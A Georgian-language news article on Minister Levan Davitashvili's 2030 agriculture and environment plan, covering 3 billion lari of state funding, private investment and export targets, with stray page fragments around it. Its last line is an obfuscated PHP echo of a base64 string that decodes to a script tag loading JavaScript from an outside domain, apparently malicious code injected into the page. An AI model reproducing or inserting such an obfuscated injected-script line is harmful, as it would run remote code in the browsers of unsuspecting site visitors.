celsiusi
ავერსი შნაიდერი
„ყველაფრისთვის საჭიროა ინვესტიციები. სახელმწიფოს თანადაფინანსების გარეშე არაფერი გამოვა. დღეს, პრემიერ-მინისტრმაც ისაუბრა, რომ უპრეცედენტოდ გაიზრდება სოფლის მეურნეობის დაფინანსება მიზნობრივი საგრანტო პროექტების მხარდასაჭერად, მხოლოდ სახელმწიფოს მხრიდან გამოყოფილი იქნება 3 მილიარდი ლარი", - განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ლევან დავითაშვილმა დარგის განვითარების გრძელვადიანი ხედვის - „გარემოს დაცვა და სოფლის განვითარება 2030“ პრეზენტაციაზე.
 
ცნობისთვის, საქართველოს პრემიერ-მინისტრის ირაკლი ღარიბაშვილის ინიციატივით, მთავრობის ათწლიანი გეგმის ფარგლებში, სამინისტროები საკუთარი მიმართულების ხედვებს წარადგენენ.
 
დავითაშვილის განცხადებით, 3 მლრდ ლარის გამოყოფა ნიშნავს, რომ კერძო სექტორი, თავის მხრივ, მოახდენს 4 მილიარდი ლარის მობილიზებას. "შემდეგი 9 წლის განმავლობაში, პირდაპირი ინვესტიციის სახით, მხოლოდ ძირითად საშუალებებში მიმართული იქნება 7 მილიარდი ლარის ინვესტიცია, იმისთვის, რომ ჩვენი ამბიციური მიზნები იქნას მიღწეული. ჩვენ გვექნება სისტემური პროექტები საკრედიტო რესურსებზე წვდომის კუთხით“, - განაცხადა მინისტრმა.
 
მისივე თქმით, საქართველოს აქვს შესაძლებლობა, 300-დან 400 მილიონ დოლარამდე ღირებულების პროდუქციის იმპორტჩანაცვლება მოახდინოს, რის შედეგადაც, სავაჭრო ბალანსი მნიშვნელოვნად გაუმჯობესდება. "ჩვენ დავიწყეთ იმპორტის ზრდის გაჩერება და საბოლოოდ, საქართველოს ეკონომიკაში, ნეტო ექსპორტი აგროსასურსათო სექტორიდან, 2030 წლისთვის, 2 მილიარდი დოლარი იქნება. ეს არის დამატებითი შემოსავლები კომპანიებისთვის, ბიზნესისთვის და ჩვენი მოქალაქეებისათვის”, - განაცხადა გარემოს დაცვისა და სოფლის მეურნეობის მინისტრმა ლევან დავითაშვილმა დარგის განვითარების გრძელვადიანი ხედვის - „გარემოს დაცვა და სოფლის განვითარება 2030“ პრეზენტაციაზე.
1242
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");